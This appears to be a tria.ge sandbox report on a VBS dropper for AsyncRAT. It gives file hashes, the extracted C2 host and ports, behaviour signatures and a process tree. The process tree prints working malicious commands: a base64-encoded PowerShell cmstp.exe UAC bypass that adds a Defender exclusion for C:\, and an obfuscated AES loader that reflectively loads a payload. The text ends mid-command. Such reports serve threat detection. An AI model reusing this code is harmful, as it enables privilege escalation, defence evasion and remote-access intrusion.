Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
149s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26/12/2024, 22:23
Static task
static1
Behavioral task
behavioral1
Sample
scriper.index.config.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
scriper.index.config.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
scriper.index.config.vbs
Resource
win10ltsc2021-20241211-en
General
-
Target
scriper.index.config.vbs
-
Size
203KB
-
MD5
0277c2765732f368a0b5260a2f100d5f
-
SHA1
88b89fa52c3ef01f500c62eaa5d420e51bcd2eb3
-
SHA256
20dd257e3dc3a5a45a864ae9de7e13e0800007b1241a5c4bc104a0ba69d9dcf3
-
SHA512
f11d1b42e1b1255044eb3dcbf3f625506174600c2f36f06847f050cafea8d5001506b34b3beafe5352b925b5dc873af9523aaab83bafde8db9177fa281b1371b
-
SSDEEP
1536:abfH0KjpWwyBGjb59fSpcnZmDf+c+CMG3892XEtSPeVDr+HeOubxS8fddN:a7H0KjppKkJSSuf+c+Zo/cP+0bxS81T
Malware Config
Extracted
asyncrat
0.5.8
Default
jt8iyre.localto.net:2101
jt8iyre.localto.net:55644
E0GLVPl3iUqi
-
delay
3
-
install
false
-
install_file
winserve.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/memory/3408-127-0x0000000007250000-0x0000000007262000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 39 3408 powershell.exe 43 3408 powershell.exe 44 3408 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3128 powershell.exe 1416 powershell.exe 1712 powershell.exe 2508 powershell.exe 3408 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 4912 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3128 powershell.exe 3128 powershell.exe 1416 powershell.exe 1416 powershell.exe 1712 powershell.exe 1712 powershell.exe 2508 powershell.exe 2508 powershell.exe 3408 powershell.exe 3408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3128 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeIncreaseQuotaPrivilege 1416 powershell.exe Token: SeSecurityPrivilege 1416 powershell.exe Token: SeTakeOwnershipPrivilege 1416 powershell.exe Token: SeLoadDriverPrivilege 1416 powershell.exe Token: SeSystemProfilePrivilege 1416 powershell.exe Token: SeSystemtimePrivilege 1416 powershell.exe Token: SeProfSingleProcessPrivilege 1416 powershell.exe Token: SeIncBasePriorityPrivilege 1416 powershell.exe Token: SeCreatePagefilePrivilege 1416 powershell.exe Token: SeBackupPrivilege 1416 powershell.exe Token: SeRestorePrivilege 1416 powershell.exe Token: SeShutdownPrivilege 1416 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeSystemEnvironmentPrivilege 1416 powershell.exe Token: SeRemoteShutdownPrivilege 1416 powershell.exe Token: SeUndockPrivilege 1416 powershell.exe Token: SeManageVolumePrivilege 1416 powershell.exe Token: 33 1416 powershell.exe Token: 34 1416 powershell.exe Token: 35 1416 powershell.exe Token: 36 1416 powershell.exe Token: SeDebugPrivilege 4912 taskkill.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeSystemEnvironmentPrivilege 2508 powershell.exe Token: SeRemoteShutdownPrivilege 2508 powershell.exe Token: SeUndockPrivilege 2508 powershell.exe Token: SeManageVolumePrivilege 2508 powershell.exe Token: 33 2508 powershell.exe Token: 34 2508 powershell.exe Token: 35 2508 powershell.exe Token: 36 2508 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeSystemEnvironmentPrivilege 2508 powershell.exe Token: SeRemoteShutdownPrivilege 2508 powershell.exe Token: SeUndockPrivilege 2508 powershell.exe Token: SeManageVolumePrivilege 2508 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 5064 wrote to memory of 3128 5064 WScript.exe 82 PID 5064 wrote to memory of 3128 5064 WScript.exe 82 PID 3128 wrote to memory of 1256 3128 powershell.exe 86 PID 3128 wrote to memory of 1256 3128 powershell.exe 86 PID 1256 wrote to memory of 3032 1256 csc.exe 87 PID 1256 wrote to memory of 3032 1256 csc.exe 87 PID 3128 wrote to memory of 1808 3128 powershell.exe 88 PID 3128 wrote to memory of 1808 3128 powershell.exe 88 PID 5064 wrote to memory of 3876 5064 WScript.exe 102 PID 5064 wrote to memory of 3876 5064 WScript.exe 102 PID 3876 wrote to memory of 1712 3876 cmd.exe 104 PID 3876 wrote to memory of 1712 3876 cmd.exe 104 PID 3876 wrote to memory of 1712 3876 cmd.exe 104 PID 1712 wrote to memory of 2508 1712 powershell.exe 105 PID 1712 wrote to memory of 2508 1712 powershell.exe 105 PID 1712 wrote to memory of 2508 1712 powershell.exe 105 PID 1712 wrote to memory of 4596 1712 powershell.exe 108 PID 1712 wrote to memory of 4596 1712 powershell.exe 108 PID 1712 wrote to memory of 4596 1712 powershell.exe 108 PID 4596 wrote to memory of 3712 4596 WScript.exe 109 PID 4596 wrote to memory of 3712 4596 WScript.exe 109 PID 4596 wrote to memory of 3712 4596 WScript.exe 109 PID 3712 wrote to memory of 3408 3712 cmd.exe 111 PID 3712 wrote to memory of 3408 3712 cmd.exe 111 PID 3712 wrote to memory of 3408 3712 cmd.exe 111
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\scriper.index.config.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zjkorqd\2zjkorqd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8201.tmp" "c:\Users\Admin\AppData\Local\Temp\2zjkorqd\CSC846A34AA4A234D0E8C60F94B311B9B9D.TMP"4⤵PID:3032
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\klur315b.inf3⤵PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+4QKE1J0K9CBQq122My7d9xjYIEzvU8nKu3pXsE/60I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VwAnjqEmBh3DPh2idDTQQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hShqt=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$Wtaby=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$wQXJL=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($hShqt, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $wQXJL.CopyTo($Wtaby); $wQXJL.Dispose(); $hShqt.Dispose(); $Wtaby.Dispose(); $Wtaby.ToArray();}function execute_function($param_var,$param2_var){ IEX '$REVPOaYHbSStfbh=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX 